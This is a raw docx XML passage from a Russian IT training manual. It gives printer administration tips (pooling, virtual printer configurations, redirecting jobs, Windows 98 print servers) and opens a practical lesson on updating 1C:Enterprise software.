        <w:t>Для того чтобы настроить принтерный пул, нужно установить экземпляр драйвера принтера на компьютер, который используется как принт-сервер (после того, как принтеры установлены физически). Затем необходимо выполнить следующие действия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В папке Printers щелкнуть правой кнопкой значок принтера и выбрать в меню пункт Properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Щелкнуть вкладку Ports и установить флажок Enable Printer Pooling.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Указать все дополнительные порты, к которым подключены принтеры в пуле. Щелкнуть OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет 4. Применяйте различные конфигурации принтеров</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Многие администраторы тщетно пытаются обучить пользователей настраивать параметры принтеров (на вкладке Properties определенного принтера, выбранного в диалоговом окне Print) для конкретных задач печати. Самая распространенная проблема заключается в том, что пользователи забывают менять лотки и печатают не на той бумаге, на какой нужно. Иногда они не знают, что в каком лотке находится, и печатают служебные записки на бланках счетов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>В данном случае можно создать виртуальный принтер со специфической конфигурацией для конкретной задачи пользователя. Тогда пользователи смогут просто выбирать из нескольких вариантов нужный принтер для своей задачи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:lastRenderedPageBreak/>
        <w:t>С помощью мастера Add Printer Wizard в папке Printers можно создать столько копий принтера, сколько требуется. Это, конечно, локальные принтеры, поскольку работа ведется на принт-сервере. Когда мастер спросит, хотите ли вы использовать текущий драйвер, следует выбрать пункт, сохраняющий текущий драйвер. Окно мастера Name The Printer отображает такое же имя, как у первого принтера, с добавлением (Copy 2), (Copy 3) и т. д. Можно переименовать принтер так, чтобы имя отражало конфигурацию, сразу или позже. Мастер также запрашивает общедоступное имя и предлагает заполнить поле комментария. И опять у нас есть два варианта – ввести информацию сейчас или сделать это позже.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>После того как все принтеры появились в папке Printers, можно настраивать каждый принтер для специфической задачи. Например, один из моих принтеров настроен на лоток 1, с официальными бланками, и лоток 2 – с бланками счетов. Как показано на рис. 2, для виртуального принтера с именем Letterhead конфигурация лотка 1 соответствует формату бумаги для писем, а второй лоток можно отметить как недоступный. Виртуальный принтер с именем Checks содержит бланки счетов в лотке 2, а лоток 1 недоступен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1835785" cy="1800225"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="267" name="Рисунок 8" descr="http://www.osp.ru/data/655/526/1234/08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www.osp.ru/data/655/526/1234/082_2.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId252" cstate="print">
                      <a:lum bright="20000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1835785" cy="1800225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Рисунок 2. Свойства принтера Letterhead: лоток 2 недоступен</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет 5. Перемещайте задания печати с неисправного принтера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Иногда в принтере возникают неполадки, скажем, застрял лист бумаги, и это нельзя устранить немедленно. Если в очереди на печать имеется несколько заданий, большинство администраторов просто удаляют задания и сообщают пользователям, что задания нужно будет отправить на принтер позже. Однако, если в сети есть другой общедоступный принтер и он использует тот же самый драйвер, можно выполнить следующие действия и переместить задание на печать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="001B566C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В папке Printers щелкнуть правой кнопкой пиктограмму неисправного принтера и выбрать Properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="001B566C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перейти на вкладку Ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="001B566C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Щелкнуть Add Port, выбрать Local Port, затем щелкнуть New Port. Далее следует ввести UNC-имя альтернативного принтера (например, ServerPrinter_Sharename).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет 6. Печатайте на принт-серверах Windows 98</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>По мере появления новых компьютеров можно превращать системы Windows 98 в принт-серверы. У меня стоит много принтеров, и после установки недорогого дополнения в виде второго параллельного порта каждый компьютер Windows 98 управляет двумя принтерами. Пользователи больше не регистрируются на этих компьютерах, поэтому их ресурсы полностью предназначены для печати – тонкое решение. Часто система выдает сообщение об ошибке Could not start print job, когда пользователи обращаются к принтерам на компьютерах Windows 98. Это не значит, что компьютеры Windows 2003, XP и Windows 2000 не могут печатать через принт-сервер Windows 98. На самом деле принт-серверы Windows 98 работают превосходно, если не пытаться задействовать функцию безопасности Windows 98, создавая в числе прочего пароль для доступа к принтеру. Пароль для принтера в Windows 98 уникален для каждого принтера, и пароль зарегистрировавшегося пользователя не действует (если только случайно не совпадает с паролем для принтера). Отключите пароль для принтера, удалив его с вкладки Sharing в диалоговом окне Properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="0094432D" w:rsidP="00A12BEF">
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc26278730"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Практическое занятие № 11 </w:t>
      </w:r>
      <w:bookmarkStart w:id="120" w:name="_Toc507788260"/>
      <w:bookmarkStart w:id="121" w:name="_Toc507788535"/>
      <w:r w:rsidR="00A12BEF" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выявление и решение проблем обновления программного обеспечения.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> приобрести навыки при выявлении и решении проблем обновления программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">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A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся рекомендации по установке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обновление версий программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков установки и настройки программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимательно ознакомиться с подробным алгоритмом установки программного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На основе прочитанного документа выработать краткие рекомендации по установке ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Выработать рекомендации по безопасной и эффективной инсталляции программного обеспечения отраслевой направленности - 1С:Предприятие 8.2, 1С:CRM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Почему нужно и важно обновлять программы 1 С</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновление - как преимущество программ 1С</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Одним из главных преимуществ системы программ 1С Предприятие является ее оперативное обновление в соответствии с изменениями в законодательстве. Разработчик программ – Фирма 1С – постоянно следит за изменениями в законодательстве: на момент подписания и утверждения новых и измененных законов и нормативных актов всегда готовы изменения конфигураций, удовлетворяющие новым требованиям.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При обновлении конфигурации вносятся изменения в информационную базу: добавляются новые документы, отчеты, функциональные возможности, изменяются существующие. При этом сохраняется вся ранее введенная информация.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Формы месячной и квартальной регламентированной отчетности также своевременно обновляются и пополняются. Полный комплект форм квартальной отчетности выпускается в первых числах месяца, следующего за отчетным кварталом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Периодически разработчиком обновляются файлы, обеспечивающие запуск и работу программ – релизы программ. Это очень важный момент, так как последние конфигурации информационных баз могут некорректно работать на старых релизах. Кроме того, вся актуальная регламентированная отчетность рассчитана на работу именно с последним релизом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Еще одним несомненным достоинством программ семейства 1С Предприятие является постоянное совершенствование их функциональных возможностей, направленных на максимальную автоматизацию и удобство в работе пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как можно обновить программу 1С</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если Вам нужна помощь в обновлении, сотрудники отдела сопровождения нашей фирмы квалифицированно и оперативно внесут необходимые изменения на Вашем рабочем месте, обратив Ваше внимание на актуальные нововведения, проконсультируют, проверят состояние и работоспособность информационных баз.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Особенно важна помощь квалифицированного специалиста, если в Ваши программы внесены индивидуальные изменения – настройки по специфике учета Вашего предприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновления также публикуются на дисках Информационно-Технологического Сопровождения, которые Вы будете получать ежемесячно, оформив у нас подписку. Кроме того, при помощи дисков ИТС у Вас появляется возможность загрузить обновления на свой компьютер через Интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как мы знаем при использовании столь сложных программных продуктов как 1С Бухгалтерия 7.7, 1С Бухгалтерия 8, 1С Управление торговлей 8, 1С (УТ 8) Управление производственным предприятием 8 (УПП 8), 1С Зарплата и кадры (ЗИК), в самой программе нередко возникают ошибки и сбои, связанные с неправильным или несвоевременным введением первичных документов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">У сотрудников время от времени возникают вопросы связанные с эксплуатацией 1С Предприятие. Иногда возникает необходимость изменить печатный вид документов, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>изменить формулу по которой будет производиться тот или иной бизнес процесс. Все это заставляет задуматься руководителей предприятия, что в штате необходимо иметь специалиста, который бы мог оперативно обслуживать 1С, при необходимости делать ее дополнительную настройку 1С, менять печатные формы, анализировать по каким причинам происходят сбои и ошибки в компьютерных базах предприятия. Консультировать сотрудников организации по вопросам возникающим у них в ходе эксплуатации программного обеспечения 1С Предприятие.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
